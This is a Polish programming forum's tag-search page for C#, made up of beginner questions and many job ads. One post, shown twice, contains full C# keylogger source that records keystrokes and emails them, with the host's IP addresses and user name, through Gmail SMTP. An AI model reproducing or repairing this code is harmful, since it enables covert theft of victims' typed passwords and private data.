Jump to content

Search the Community

Showing results for tags 'c#'.

 • Search By Tags

  Type tags separated by commas.
 • Search By Author

Content Type


Forums

 • Programowanie
  • Java
  • C++
  • C
  • Assembler
  • .NET Framework
  • Delphi / Pascal
  • Objective-C
  • Swift
  • Rust
  • Go
  • D
  • Visual Basic
  • Inne jezyki programowania
 • Języki skryptowe
  • JavaScript
  • PHP
  • Python
  • Ruby
  • Perl
  • Lua
  • VBScript
  • Programy wsadowe i shell
  • Inne języki skryptowe
 • Programowanie funkcyjne
  • Haskell
  • Lisp
 • Bazy danych
  • SQL i bazy danych
  • NoSQL nierelacyjne bazy danych
  • ABAP
  • Visual FoxPro
 • Projektowanie i inżynieria oprogramowania
  • Algorytmy i struktury danych
  • Inżynieria oprogramowania
  • Projektowanie UI i UX
  • Reverse engineering
 • Projektowanie stron internetowych
  • HTML, XHTML i XML
  • CSS
  • Optymalizacja SEO
  • Inne
 • Praca, edukacja i kariera
  • Oferty pracy
  • Zlecenia
  • Kariera
  • Edukacja
  • Szkolenia i konferencje
  • Biznes i prawo
  • Magazyn Programista
 • Projekty
  • Moje projekty
  • Mam pomysł na...
  • Konkursy
 • Hardware i software
  • Projektowanie i programowanie elektroniki
  • Hardware i software
  • Sieci komputerowe i Internet
 • Forum
  • Ogłoszenia, uwagi i sugestie
  • Społeczność
  • Off Topic
  • Giełda

Find results in...

Find results that contain...


Date Created

 • Start

  End


Last Updated

 • Start

  End


Filter by number of...

Joined

 • Start

  End


Group


Website

 1. Jak zrobić aplikacje która będzie cały czas wchodzić w podany link?
 2. Szukałam i nie znalazłam Jak odwołać się z konstruktora klasy Osoba do konstruktora klasy Adres? Wyskakuje mi błąd w klasie Osoba, z którym nie wiem jak sobie poradzić. Już drugi tydzień się z tym męczę. Proszę o pomoc i wytłumaczenie. Nie mogę zastosować get, sat i nie mogę zmieniać kodu w klasie Program. W klasie Osoba i Adres wszystkie nazwy muszą pozostać takie jakie są. Kod trzeba przerobić tak aby efekt końcowy był jak na obrazku. Klasa Osoba using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace Kadry { public class Osoba { private int numerEwidencyjny; private string nazwisko; private string imie; Adres adres; public Osoba(int numerEwidencyjny, string nazwisko, string imie, Adres adres) { this.numerEwidencyjny = numerEwidencyjny; this.nazwisko = nazwisko; this.imie = imie; this.adres = adres; } public Osoba(int numerEwidencyjny, string imie, int numerDomu) : this(numerEwidencyjny, "Kowalski", imie, "02-222", "Warszawa", "Aleje Jerozolimskie", numerDomu, 0) { } public Osoba(ref Osoba osoba) { numerEwidencyjny = osoba.numerEwidencyjny; nazwisko = osoba.nazwisko; imie = osoba.imie; adres = osoba.adres; } public string ZwrocKod() { return adres.kod; } public string ZwrocMiejscowosc() { return adres.miejscowosc; } public string ZwrocNazweUlicy() { return adres.nazwaUlicy; } public int ZwrocNumerDomu() { return adres.numerDomu; } public int ZwrocNumerMieszkania() { return adres.numerMieszkania; } public string ZwrocInformacjeOsobowe() { return string.Format("\n Pan(i) {0} {1} o numerze ewidencyjnym: {2} zamieszkały(a): {3} {4} {5}", nazwisko, imie, numerEwidencyjny, ZwrocKod(), ZwrocMiejscowosc(), ZwrocNazweUlicy() + " " + ZwrocNumerDomu() + " m" + ZwrocNumerMieszkania()); } public void ZmienDaneOsobowe() { Console.Write("Podaj imię: "); imie = Console.ReadLine(); Console.Write("Podaj nazwisko: "); nazwisko = Console.ReadLine(); do { Console.Write("Podaj numer ewidencyjny: "); } while (!int.TryParse(Console.ReadLine(), out numerEwidencyjny)); } public void ZmienAdres() { Console.Write("Podaj kod: "); adres.kod = Console.ReadLine(); Console.Write("Podaj nazwę miejscowści: "); adres.miejscowosc = Console.ReadLine(); Console.Write("Podaj nazwę ulicy "); adres.nazwaUlicy = Console.ReadLine(); do { Console.Write("Podaj numer domu: "); } while (!int.TryParse(Console.ReadLine(), out adres.numerDomu)); Console.Write("Czy jest numer mieszkania <t/n>: "); char c = Console.ReadKey().KeyChar; if (c == 't') { Console.WriteLine(); do { Console.Write("Podaj numer meszkania: "); } while (!int.TryParse(Console.ReadLine(), out adres.numerMieszkania)); } else { adres.numerMieszkania = 0; } } public Osoba Klonuj() { return (Osoba)this.MemberwiseClone(); } } } Klasa Adres using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace Kadry { public class Adres { public string kod; public string miejscowosc; public string nazwaUlicy; public int numerDomu; public int numerMieszkania; public Adres(string kod, string miejscowosc, string nazwaUlicy, int numerDomu, int numerMieszkania) { this.kod = kod; this.miejscowosc = miejscowosc; this.nazwaUlicy = nazwaUlicy; this.numerDomu = numerDomu; this.numerMieszkania = numerMieszkania; } public Adres(ref Adres adres) { kod = adres.kod; miejscowosc = adres.miejscowosc; nazwaUlicy = adres.nazwaUlicy; numerDomu = adres.numerDomu; numerMieszkania = adres.numerMieszkania; } } } Klasa Program using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace Kadry { public class Program { static void Main(string[] args) { Osoba os1 = new Osoba(5, "Ola", 43); Console.WriteLine(" Oryginał {0}", os1.ZwrocInformacjeOsobowe()); Console.WriteLine("\n***Zmieniamy klon:***\n"); Osoba klon1 = os1.Klonuj(); Console.WriteLine("\n Klon: {0}", klon1.ZwrocInformacjeOsobowe()); klon1.ZmienDaneOsobowe(); klon1.ZmienAdres(); Console.WriteLine("\n Klon: {0}", klon1.ZwrocInformacjeOsobowe()); Osoba os3 = new Osoba(ref os1); Console.WriteLine(" Oryginał {0}", os3.ZwrocInformacjeOsobowe()); Console.WriteLine("\n***Zmieniamy klon:***\n"); Console.WriteLine("\n Klon: {0}", klon1.ZwrocInformacjeOsobowe()); klon1.ZmienDaneOsobowe(); klon1.ZmienAdres(); Console.WriteLine("\n Klon: {0}", klon1.ZwrocInformacjeOsobowe()); Console.ReadKey(); } } }
 3. Witam zaczynam z programowaniem więc postanowiłem zrobić dla siebie zrobić keyloggera według poradnika ale pojawił się problem nie wysyłało maili (próbowałem na gmail) próbowałem różnych sposobów ale żaden nie działa więc jeśli ktoś ma ochotę to tu ma kod : using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Net; using System.Net.Mail; using System.Runtime.InteropServices; using System.Text; using System.Threading; using System.Threading.Tasks; namespace ANKAiKUBAtoJednaOSOBA { class Program { [DllImport("User32.dll")] public static extern int GetAsyncKeyState(Int32 i); // string to hold all of the keystrokes static long numberOfKeystrokes = 0; static void Main(string[]args) { String filepath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); if (!Directory.Exists(filepath)) { Directory.CreateDirectory(filepath); } string path = (filepath + @"\keystrokes.txt"); if (File.Exists(path)) { using (StreamWriter sw = File.CreateText(path)) { } } // plan // 1 - capture keystrokes and display them to the console while (true) { //pause and let other programs get a chance to run. Thread.Sleep(5); //check all keys for their state for (int i = 32; i < 127; i++) { int keyState = GetAsyncKeyState(i); //print to the console if (keyState == 32769) { Console.Write((char) i + ", "); // 2 - store the strokes info a text file using (StreamWriter sw = File.AppendText(path)) { sw.Write((char)i); } numberOfKeystrokes++; // send every 100 charagters typed. if (numberOfKeystrokes % 100 == 0 ) { SendNewMessage(); } } // 3 - periodically send the contents of the file to an extrenal mail addres } } }//main static void SendNewMessage() { //send the contens of the text file to an extrenal email address String folderName = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); string filePath = folderName + @"\keystrokes.txt"; String logContents = File.ReadAllText(filePath); string emailBody = ""; //Create an mail message DateTime now = DateTime.Now; string subject = "Message from keylogger"; var host = Dns.GetHostEntry(Dns.GetHostName()); foreach (var address in host.AddressList) { emailBody += "Address:" + address; } emailBody += "\n User: " + Environment.UserDomainName + "\\" + Environment.UserName; emailBody += "\nhost" + host; emailBody += "\ntime:" + now.ToString(); emailBody += logContents; SmtpClient client = new SmtpClient("smtp.gmail.com",587); MailMessage mailMessage = new MailMessage(); mailMessage.From = new MailAddress("jakiś.tam@gmail.com"); mailMessage.To.Add("jakiś.tam@gmail.com"); mailMessage.Subject = subject; client.UseDefaultCredentials = false; client.EnableSsl = true; client.Credentials = new System.Net.NetworkCredential("jakiś.tam@gmail.com", "Hasło123"); mailMessage.Body = emailBody; client.Send(mailMessage); } } }
 4. Witam zaczynam z programowaniem więc postanowiłem zrobić dla siebie zrobić keyloggera według poradnika ale pojawił się problem nie wysyłało maili (próbowałem na gmail) próbowałem różnych sposobów ale żaden nie działa więc jeśli ktoś ma ochotę to tu ma kod : using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Net; using System.Net.Mail; using System.Runtime.InteropServices; using System.Text; using System.Threading; using System.Threading.Tasks; namespace ANKAiKUBAtoJednaOSOBA { class Program { [DllImport("User32.dll")] public static extern int GetAsyncKeyState(Int32 i); // string to hold all of the keystrokes static long numberOfKeystrokes = 0; static void Main(string[]args) { String filepath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); if (!Directory.Exists(filepath)) { Directory.CreateDirectory(filepath); } string path = (filepath + @"\keystrokes.txt"); if (File.Exists(path)) { using (StreamWriter sw = File.CreateText(path)) { } } // plan // 1 - capture keystrokes and display them to the console while (true) { //pause and let other programs get a chance to run. Thread.Sleep(5); //check all keys for their state for (int i = 32; i < 127; i++) { int keyState = GetAsyncKeyState(i); //print to the console if (keyState == 32769) { Console.Write((char) i + ", "); // 2 - store the strokes info a text file using (StreamWriter sw = File.AppendText(path)) { sw.Write((char)i); } numberOfKeystrokes++; // send every 100 charagters typed. if (numberOfKeystrokes % 100 == 0 ) { SendNewMessage(); } } // 3 - periodically send the contents of the file to an extrenal mail addres } } }//main static void SendNewMessage() { //send the contens of the text file to an extrenal email address String folderName = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); string filePath = folderName + @"\keystrokes.txt"; String logContents = File.ReadAllText(filePath); string emailBody = ""; //Create an mail message DateTime now = DateTime.Now; string subject = "Message from keylogger"; var host = Dns.GetHostEntry(Dns.GetHostName()); foreach (var address in host.AddressList) { emailBody += "Address:" + address; } emailBody += "\n User: " + Environment.UserDomainName + "\\" + Environment.UserName; emailBody += "\nhost" + host; emailBody += "\ntime:" + now.ToString(); emailBody += logContents; SmtpClient client = new SmtpClient("smtp.gmail.com",587); MailMessage mailMessage = new MailMessage(); mailMessage.From = new MailAddress("jakiś.tam@gmail.com"); mailMessage.To.Add("jakiś.tam@gmail.com"); mailMessage.Subject = subject; client.UseDefaultCredentials = false; client.EnableSsl = true; client.Credentials = new System.Net.NetworkCredential("jakiś.tam@gmail.com", "Hasło123"); mailMessage.Body = emailBody; client.Send(mailMessage); } } }
 5. Cześć, chcę stworzyć program wyświetlający wyniki wyszukiwania internetowego z aktywnymi linkami, jak DuckDuckGo. Używam przeglądarki PhantomJS bez interfejsu. Pobieram dane z rezultatów wyszukiwarki Qwant Lite. Teraz na okienku aplikacji wypisanych jest tylko kilka rezultatów (tytuły, adresy URL i opisy stron) bez odnośników. Podam przykład: Zauważyłem, że są pokazywane wszystkie skopiowane z Qwant Lite tytuły bez właściwości PropertyUrl. Ta właściwość określa, do jakiej strony trafi użytkownik po kliknięciu lewym przyciskiem myszy w tytuł. Tytuły nie są jednak odnośnikami do jakiejkolwiek strony. Jak wyświetlić wszystkie rezultaty wyszukiwarki z linkami? bool search_end = false, page_se = false; byte page = 0; // Numer rezultatu while (!search_end) { try { while (!page_se) { try { Run title = new Run(phantomDriver.FindElements(By.ClassName("result")).ElementAt(page).FindElement(By.ClassName("title")).Text); // Tytuł strony Hyperlink hyperlink = new Hyperlink(title) { NavigateUri = new Uri(phantomDriver.FindElements(By.ClassName("result")).ElementAt(page).FindElement(By.ClassName("url")).Text) }; Results.Inlines.Add(hyperlink); // Results - Nazwa elementu TextBlock | Dodawanie linku Results.Text += Environment.NewLine; Results.Text += phantomDriver.FindElements(By.ClassName("result")).ElementAt(page).FindElement(By.ClassName("url")).Text + Environment.NewLine; // Dodawanie adresu URL Results.Text += phantomDriver.FindElements(By.ClassName("result")).ElementAt(page).FindElement(By.ClassName("desc")).Text + Environment.NewLine + Environment.NewLine; // Dodawanie opisu ++page; // Pobieranie danych z następnego wyniku } catch { page_se = true; // Koniec kopiowania informacji z obecnej strony wyszukiwarki } } phantomDriver.FindElement(By.ClassName("next")).Click(); // Przejście do następnej strony page = 0; } catch // Zamknięcie przeglądarki { phantomDriver.Quit(); search_end = true; } }
 6. Senior C++/C# Software Developer - Nr ref. (107/142) Kraków Job description We are looking for experienced Software Developer interested to join this team who will: Estimate, design and develop new features according to User Stories and Acceptance Criteria. Refactor existing code, use TDD techniques, and apply rules of SOLID Design principles. Deliver high quality solutions, even in case where a “quick fix” may be enough. Communicate effectively with the team and with customers. Maintain a complex code base. Contribute to feature/function and system test automation. Debug code and profile system performance to troubleshoot functional and nonfunctional issues. Participate in code reviews. Write documentation for bug fixes and implemented features. Demo software to internal customers. Requirements Work experience with C++ 11 and STL library. Experience with C#, .NET 4,5, async framework. Knowledge of MFC, Visual Studio 2012/2013, WCF, WinForms and WPF. Experience with GIT version control system. Knowledge of Microsoft Windows development. Knowledge of relational databases, PL SQL. Good knowledge of algorithms and complexities. Designing SOA and REST web services. Communicative English. Additional requirements Understanding of OOP/OOD principles and patterns, SOLID, design patterns (Gang of Four). Previous experience with desktop applications and database development. Knowledge of Scrum methodology. Experience with Boost library. Using tools: Google Mock, Google Test, NMock/Moq with NUnit. Knowledge of NHibernate, ASP.NET, log4net. Offer The budget for this position is up to 19 400 PLN B2B or up to 14 700 PLN standard work agreement. Possibility to develop skills and gain new qualifications with the latest technologies. Possibility to attend internal and external training. Relocation package (4500 PLN total value), paid in three installments (1500 PLN per month). Benefits: Extended medical care (over 80 medical facilities in Kraków) for you and your family. Multisport Benefit card. Home office option (up to 8 days, after the adaptation period). High standard facilities, kitchen or easy access to food-courts or restaurants; comfortable location, easy access by public transport, parking for bicycles.
 7. Tester oprogramowania - Nr ref. (81/01) Kraków Opis stanowiska Stanowisko przeznaczone jest dla specjalisty z zakresu jakości oprogramowania, który dołączy do zespołu tworzącego i rozwijającego produkty Klienta z Wielkiej Brytanii, operującego w zakresie zagadnień związanych z dystrybucją energii elektrycznej, głównie Demand Response. Szukamy osoby skupionej na poszerzanie zakresu swoich umiejętności oraz prezentującej praktyczne podejście do realizacji projektów informatycznych. Więcej informacji na temat oferty udzieli Joanna Kempińska: joanna.kempinska[at]infolet.pl Wymagania Co najmniej 1 rok doświadczenia na podobnym stanowisku Znajomość przynajmniej jednego języka obiektowego (np. Java, C++, C#) Wiedza z zakresu wytwarzania (CI) oraz testowania oprogramowania (BDD, TDD) Doświadczenie w zakresie tworzenia scenariuszy i przypadków testowych Umiejętność tworzenia testów jednostkowych oraz funkcjonalnych/integracyjnych Znajomość narzędzi i frameworków do testowania oprogramowania (np. JUnit, TestNG, Mockito, Spock, Selenium, Thucydides, JMeter) Doświadczenie z systemami raportowania błędów (JIRA) Zdolność analitycznego myślenia i rozwiązywania problemów Mile widziane Znajomość przynajmniej jednego języka skryptowego (preferowany Python) Doświadczenie w testach wydajnościowych i bezpieczeństwa Doświadczenie w testowaniu systemów rozproszonych Znajomość protokołów sieciowych (TCP/IP, HTTP) Podstawowa znajomość środowiska UNIX/ Linux Podstawowe doświadczenie z Raspberry Pi Oferujemy Konkurencyjne wynagrodzenie Prywatne ubezpieczenie zdrowotne Lekcje j. angielskiego w biurze Nacisk na rozwój, szkolenia i poszerzanie horyzontów Przyjazne biuro, miejsca parkingowe Elastyczne godziny pracy Pyszna kawa i herbata Piłkarzyki, hamaki, xbox, mini bilard
 8. Senior Scrum Master - Nr ref. (02/200) Kraków Job description As a Senior Scrum Master you will be responsible for empower team to self-organize, facilitate communication and improve transparency, support Product Owner, cooperate with delivery manager, organize and facilitate Scrum events, encourage discussion, conflict resolution, alternatives or different approaches. You will also help mitigate distractions and increase the team's focus, facilitate product delivery via collaboration and discussion and also track team progress, as well as sprint or release progress. For more information or to apply, please contact Patrycja Pałacka-Wilk: ppw[at]infolet.pl Requirements Experience in the Scrum Master role for at least three years; Good knowledge of Scrum and software development processes, tools and methodologies; Experience with other methodologies for managing software development projects and understand variety of software development life cycle models; Experience in Software Development domain; Ability to handle multiple simultaneous tasks and streams of work. Additional requirements Knowledge of JIRA, Rally, Clarity tools; Knowledge of network oriented, backend software architectures; Knowledge of C++, Java or C# technologies. Our offer Large development possibilities with the latest technologies; Work in international environment; The budget for this position is between 8 000 - 15 600 PLN and depends on the chosen form of the agreement (standard work agreement or B2B); Personal development and training; Medical care; Benefit Multisport; Home office option (up to 8 days, after adaptation period); Relocation package.
 9. C# Developer - Nr ref. (05/52) Kraków Job description We are looking for an experienced C# and .NET Developer. Project is connected with Intelligent Middleware, a set of Location, Presence, Mapping, Messaging and Group Management services running on top of modern communications systems. Access to the services and processed data is made available to external applications via public API. Your responsibilities will include design, implementation, testing, development and maintenance of the software for public safety communications. Our Partner's projects are carried out exclusively using Agile and Scrum approach. For more information or to apply, please contact Joanna Kempińska: joanna.kempinska[at]infolet.pl Requirements 3+ years of professional experience with C# and .NET Knowledge of SQL and databases English language skills at level allowing efficient communication Additional requirements Experience with BDD Multithreaded programming Administration of Windows Server (2008, 2012) Knowledge of Windows Communication Foundation (WCF) Knowledge of design patterns Experience with GIT/Stash and continuous integration (Hudson) Our offer Competitive salary package Strong team-oriented culture, access to wellness facilities and integration events Comfortable work conditions (high class offices, parking space) Private medical coverage Life insurance Technical communities Trainings and broad development opportunities
 10. Job description In the role of .NET Systems Engineer, you will apply your technical proficiency across different stages of the Software Development and Maintenance Life Cycle including Requirements Elicitation, Problem Analysis, Coding and Testing of software applications. You will deliver high quality code deliverables, conduct validation for all types of testing and support activities. You will respond to the issues assigned, do analysis, suggest/ implement work around, communicate to all the stakeholders and close issues as per the agreed timelines. You will be part of a learning culture, where teamwork and collaboration are encouraged, excellence is rewarded, and diversity is respected and valued. The posision requires shifts work: 8.00-16.00 or 12.00-20.00 individually agreed with Manager. For more information or to apply please contact Patrycja Pałacka-Wilk ppw[at]infolet.pl Requirements Bachelor's degree or foreign equivalent required from an accredited institution; At least 2 years of experience with excellent technology understanding of Visual Basic, VB/C# .NET, MS SQL server and MS access; At least 2 years of experience in development and maintenance of applications using Visual Basic, VB.NET, ASP.NET, C# and MS SQL Server; Recent experience in developing and deploying ASP.NET applications; Strong written and verbal communication skills and fluent knowledge of English; Strong understanding of common software development and maintenance practices; Good Analytical skills. Additional requirements Understanding and usage of SQL Server and Visual basic 6; Good to have experience in Insurance domain; Ability to work in team in diverse/ multiple stakeholder environment; Experience and desire to work in a Global delivery environment. Our offer Opportunity to be part of newly build, highly specialized team that works in multicultural organization; Standard work agreement, competitive salary and significant yearly bonus; Social bonuses: medical health care for you and your familly, multisport card and other; Telephone, laptops and other tools; External and internal trainings; Possibility to travel to other company location across Europe. To apply please send your CV in Polish or English: praca@infolet.pl
 11. Dla naszego Klienta poszukujemy Kandydatów i Kandydatek na stanowisko: Informatyk – Programista Miejsce pracy: Łódź – Widzew Zadania: • Programowanie w MS Visual Studio (C#, .Net) • Tworzenie oprogramowania zgodnie z dostarczonymi wytycznymi • Tworzenie dokumentacji technicznej tworzonych programów i aplikacji • Rozwiązywanie problemów w tworzonych programach i aplikacjach Wymagania: • Znajomość baz danych MS SQL • Dobra znajomość systemów Microsoft Windows • Dobra znajomość pakietu Microsoft Office • Dobra znajomość języka angielskiego • Dyspozycyjność do pracy min. 20 godzin tygodniowo Oferujemy: • Elastyczny grafik (możliwość indywidualnego dostosowania godzin pracy) • Możliwość zdobycia doświadczenia • Szansa na stabilną współpracę Proszę o wysłanie aplikacji na adres e-mail: d.jedrzejczak@flexidea.pl
 12. C# Software Developer - Nr ref. (02/203) Kraków Job description The person on this position will be responsible for working on a new functionality being planned for the product. C# Software Developer will be provide to the team, advise regarding architecture and good programming practices, based on IT knowledge\ experience. May deliver solutions of good quality and proper design and work on product maintenance. Candidate will be work very tightly with the developer/ quality assurance team in order to ensure the product is being developed in a coherent and proper direction. Additionally will collaborate with the marketing/ delivery partners in order to have a good understanding of business needs and made commitments. Requirements Documented experience with a commercial products developed in C#, minimum 3 years of experience. Skill in developing web services. Good understanding of SQL language with at least 1 year of experience. Being familiarized with an Agile concept. Very good English written and spoken. Open minded approach, openness for team work and corporate-wide collaboration. Additional requirements C++ with STL. Experience with Agile\ SCRUM framework. C#.NET, ASP.NET knowledge\ experience. Our offer Large development possibilities with the latest technologies. Work in international environment. The budget for this position is between 8 000 - 15 600 PLN and depends on the chosen form of the agreement (standard work agreement or B2B). Personal development and training. Medical care. Benefit Multisport. Home office option (up to 8 days, after adaptation period). Relocation package. To apply please send your CV in Polish or English: praca@infolet.pl
 13. Mobile Developer - Nr ref. (02/209) Kraków Job description As a Senior Mobile Developer, the new hire will be joining a collaborative Agile team building custom software development tools and solutions for FE. In addition, they will be integral in working with other teams which will improve overall integration throughout the portfolio. Requirements Strong software design, development and implementation of software, hardware solutions, systems and products. Mobile Development experience on both phone and tablet minimum +4 years of experience. Experience with Android and iOS. Ability to create and present mock-ups and visual designs. Experience with HTML, CSS and Javascript. Excellent oral and written communication skills. Experience in managing and maintaining a local DEV environment. Bachelor's degree or equivalent. Additional requirements Solid and Clean Code standards is a plus. C#/.Net is a plus. Thorough knowledge of internet infrastructure and have worked with formal testing environments. Exceptional communication and interpersonal skills with meticulous attention to detail. Our offer Large development possibilities with the latest technologies. Work in international environment. The budget for this position is between 8900 - 15 600 PLN and depends on the chosen form of the agreement (standard work agreement or B2B). Personal development and training. Medical care. Benefit Multisport. Home office option (up to 8 days, after adaptation period). Relocation package. To apply please send your CV in Polish or English: praca@infolet.pl
 14. Talent Hills to zespół wyspecjalizowanych Konsultantów, którzy od lat swoją wiedzą i ekspertyzą wspierają największe marki technologiczne w rekrutacji najlepszych Specjalistów branży IT. Należymy do niewielkiego grona firm rekrutacyjnych w Polsce, które swoją działalność w pełni koncentrują na sektorze technologii informacyjnych. Nasze bogate i wieloletnie doświadczenie gwarantuje dzisiaj Kandydatom i Klientom Talent Hills pełne zrozumienie branży, rzetelną konsultację oraz usługę rekrutacyjną najwyższej jakości. Dla jednego z naszych Klientów aktualnie poszukujemy kandydatów na stanowisko: C#/.NET DEVELOPER Klientem Talent Hills jest jeden z wiodących dostawców innowacyjnych rozwiązań i usług płatniczych o kapitale amerykańskim. Dynamiczny rozwój organizacji naszego Klienta niesie za sobą nowe wymagania wobec systemów i infrastruktury IT, a przed kilkudziesięcioosobowym działem IT stawia kolejne wyzwania. Dlatego też do zespołu Rozwoju Systemów Transakcyjnych nasz Klient aktualnie poszukuje doświadczonego C#/.Net Developer’a. Opis Stanowiska: Rozwój systemów transakcyjnych opartych o framework .Net i bazy danych MS SQL Server (zarówno aplikacje desktopowe, jak i webowe); Udział w projektowaniu rozwiązań; Współpraca z Analitykami i członkami innych zespołów developerskich zlokalizowanych w Europie oraz w USA; Udział w projektach wdrożeniowych; Tworzenie dokumentacji technicznej. Wymagania: Bardzo dobra znajomość języka programowania C#, znajomość Visual Basic będzie mile widziana; Minimum 2-letnie doświadczenie komercyjne w rozwoju oprogramowania w oparciu o framework .Net; Umiejętność projektowania aplikacji oraz praktyczna znajomość wzorców projektowych; Bardzo dobra znajomość baz danych MS SQL Server oraz języków SQL i T-SQL; Znajomość technologii webowych, takich jak JavaScript, HTML, CSS, PHP będzie dodatkowym atutem; Bardzo dobra znajomość języka angielskiego (współpraca międzynarodowa); Umiejętność samodzielnego podejmowania decyzji i rozwiązywania problemów; Komunikatywność i umiejętność pracy w zespole. Oferujemy: Rozwój zawodowy w dynamicznej organizacji jednego z rynkowych liderów branży nowoczesnych płatności; Dostęp do ciekawych rozwiązań i technologii; Samodzielność w działaniu; Przyjazną atmosferę pracy w ambitnym i profesjonalnym zespole; Stabilne zatrudnienie wraz z bogatym pakietem benefitów; Forma zatrudnienia: umowa o pracę.
 15. Talent Hills to zespół wyspecjalizowanych Konsultantów, którzy od lat swoją wiedzą i ekspertyzą wspierają największe marki technologiczne w rekrutacji najlepszych Specjalistów branży IT. Należymy do niewielkiego grona firm rekrutacyjnych w Polsce, które swoją działalność w pełni koncentrują na sektorze technologii informacyjnych. Nasze bogate i wieloletnie doświadczenie gwarantuje dzisiaj Kandydatom i Klientom Talent Hills pełne zrozumienie branży, rzetelną konsultację oraz usługę rekrutacyjną najwyższej jakości. Dla jednego z naszych Klientów aktualnie poszukujemy kandydatów na stanowisko: C#/.NET DEVELOPER Klientem Talent Hills jest jeden z wiodących dostawców elektronicznych usług płatniczych o kapitale amerykańskim. Dynamiczny rozwój organizacji naszego Klienta niesie za sobą nowe wymagania wobec systemów i infrastruktury IT, a przed kilkudziesięcioosobowym działem IT stawia kolejne wyzwania. Dlatego też do zespołu Rozwoju Oprogramowania nasz Klient aktualnie poszukuje doświadczonego C#/.Net Developer’a. Opis Stanowiska: Rozwój na potrzeby grupy systemów i aplikacji biznesowych opartych o framework .Net, głównie webowych, ale także desktopowych; Udział w projektowaniu rozwiązań; Współpraca z Analitykami i członkami innych zespołów developerskich zlokalizowanych w Europie oraz w USA; Udział w projektach wdrożeniowych; Tworzenie dokumentacji technicznej. Wymagania: Bardzo dobra znajomość języka programowania C#, znajomość Visual Basic będzie mile widziana; Minimum 2-letnie doświadczenie komercyjne w rozwoju oprogramowania w oparciu o framework .Net; Umiejętność projektowania aplikacji oraz praktyczna znajomość wzorców projektowych; Bardzo dobra znajomość baz danych MS SQL Server oraz języków SQL i T-SQL; Znajomość technologii webowych, takich jak JavaScript, HTML, CSS, PHP będzie dodatkowym atutem; Bardzo dobra znajomość języka angielskiego (współpraca międzynarodowa); Umiejętność samodzielnego podejmowania decyzji i rozwiązywania problemów; Komunikatywność i umiejętność pracy w zespole. Oferujemy: Rozwój zawodowy w dynamicznej organizacji jednego z rynkowych liderów branży nowoczesnych płatności; Dostęp do ciekawych rozwiązań i technologii; Samodzielność w działaniu; Przyjazną atmosferę pracy w ambitnym i profesjonalnym zespole; Stabilne zatrudnienie wraz z bogatym pakietem benefitów; Forma zatrudnienia: umowa o pracę.
 16. Witam. Od 9 lat prowdzę projekt do obsługi danych medycznych w gabinetach lekarski i rozliczeń z NFZ. Chciałbym go trochę unowocześnić i poszukuję chętnych do współpracy. Warunki współpracy do ustalenia. Wykorzystywane technologie to C#, ASP i SQL. Proszę o zgłoszenia na dariuszpakosz@gmail.com Pozdrawiam.
 17. hubot

  OpenGL w C#

  Wie ktoś może jak zainstalować OpenGL w C# w Visual Studio Community 2015? Będę wdzięczny za odpowiedź.
 18. Witam. Chciałbym sobie stworzyć stronę WWW napisaną w ASP.NET lecz podczas uruchomienia nowo utworzonego projektu pokazuje mi takie coś: http://zapodaj.net/107aa12b7ea4e.png.html. Dodanie pliku Default.aspx nic nie daje. Nie da się uruchomić żadnej aplikacji ASP.NET przez przez ten błąd. Strona jest pisana z użyciem języka C#. Środowisko, z którego korzystam to Visual Studio 2015 Community. Zaznaczyłem w trakcie tworzenia aplikacji ASP.NET Web API. Na ustawieniu ASP.NET MVC i ASP.NET Empty też nic nie pomaga. Co mam robić, żeby mi to działało? Link do mojego rozwiązania: http://sendfile.es/pokaz/564884---3z9p.html
 19. Poszukuję Developera ASP.NET MVC, który dołączy do zespołu wewnętrznego IT w międzynarodowej firmie z branży motoryzacyjnej, który będzie brał udział w rozwoju aplikacji webowych (niektóre projekty są desktopowe) na wewnętrzne potrzeby firmy. Obecny projekt, to aplikacja do zarządzania delegacjami, ale w planie są kolejne, dlatego też możliwe jest zróżnicowanie projektów i nowe wyzwania w ramach jednej firmy. Zastosowane technologie to m.in.: - ASP.NET - MVC - C# - Oracle RDBMS - Windows Workflow Foundation Wynagrodzenie do negocjacji: - 7.000 PLN brutto (do negocjacji zależnie od doświadczenia i umiejętności) - 500 PN netto / dzień na B2B (do negocjacji zależnie od doświadczenia i umiejętności) Oferujemy: - elastyczny czas pracy oraz dogodną formę zatrudniania w Sii (umowa o prace lub B2B) - pakiet benefitów dodatkowych (Medicover, Ubezpieczenie, Benefit System Kafeteria, itp.) - możliwość rozwoju zawodowego oraz pakiet szkoleń - wyjazdy integracyjne oraz imprezy rodzinne - świetną atmosferę pracy w firmie z nagrodami „Best Place to Work 2015” oraz „Najlepsze Miejsce Pracy w IT” wg. Computerworld Audit. Zapraszam do kontaktu na email: wojciech.dreja@pl.sii.eu także w przypadku zainteresowania innymi projektami / lokalizacjami / technologiami, gdyż realizujemy wiele ciekawych projektów w całej Polsce. Pozdrawiam, Wojciech Dreja Recruitment & HR Team Leader Sii Katowice
 20. Programista .NET IMPAQ Group Zadania: • wytwarzaniu wysokiej jakości oprogramowania • rozwiązywaniu problemów programistycznych oraz optymalizacji kodu • tworzeniu dokumentacji projektowej Wymagania: • Umiejetności: o .NET o C# o REST API o NUnit o programowanie obiektowe • Narzędzia: o Visual Studio 2010-2015, o TFS, o Git • angielski na poziomie komunikatywnym Lokalizacja: • Warszawa • Poznań • Lublin • Zdalnie Widełki: 600/800 netto/dzień Możliwe formy zatrudnienia: umowa o pracę, zlecenie, b2b. Kontakt: marta.pawlak@impaqgroup.pl
 21. Ciekawy wpis o tym czy używać czy nie słówka kluczowego VAR do deklaracji zmiennych w C# http://blogprogramisty.net/slowo-kluczowe-var-uzywac-czy-nie-uzywac/
